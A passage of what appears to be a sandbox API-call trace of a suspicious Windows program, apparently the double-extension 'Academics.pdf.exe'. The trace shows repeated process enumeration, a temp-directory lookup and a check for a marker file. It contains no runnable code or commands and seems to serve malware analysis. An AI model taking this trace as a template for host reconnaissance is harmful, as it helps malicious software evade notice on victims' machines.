hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0310.261] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.262] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0310.263] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.264] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0310.264] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0310.265] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0310.266] CloseHandle (hObject=0x294) returned 1 [0310.266] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0310.266] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0310.266] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0310.268] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0310.269] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0310.270] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0310.271] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0310.272] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0310.272] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0310.273] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0310.274] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0310.275] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0310.276] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0310.276] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.277] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.278] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.279] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.279] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.280] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0310.281] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.282] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.283] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0310.284] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0310.284] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0310.285] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0310.286] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.287] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0310.288] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0310.289] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0310.289] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0310.290] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0310.291] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0310.292] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0310.293] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0310.293] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0310.294] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0310.295] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0310.296] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0310.297] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0310.297] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0310.298] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0310.299] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0310.300] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0310.301] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0310.302] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0310.302] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.303] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0310.304] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.305] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0310.306] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0310.307] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0310.308] CloseHandle (hObject=0x294) returned 1 [0310.308] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0310.308] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0310.308] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0310.310] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0310.311] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0310.312] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0310.313] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0310.314] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0310.314] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0310.315] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0310.316] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0310.317] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0310.318] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0310.319] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.320] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.321] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.322] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.322] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0310.335] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0310.335] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0310.336] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0310.336] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0310.336] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf2a0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0310.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0310.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0310.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0310.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0310.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0310.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0310.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0310.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0310.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0310.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0310.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0310.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0310.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0310.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0310.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0310.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0310.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0310.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0310.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0310.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0310.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0310.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0310.337] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\8x8x8")) returned 0x2020 [0310.337] HeapFree (in: 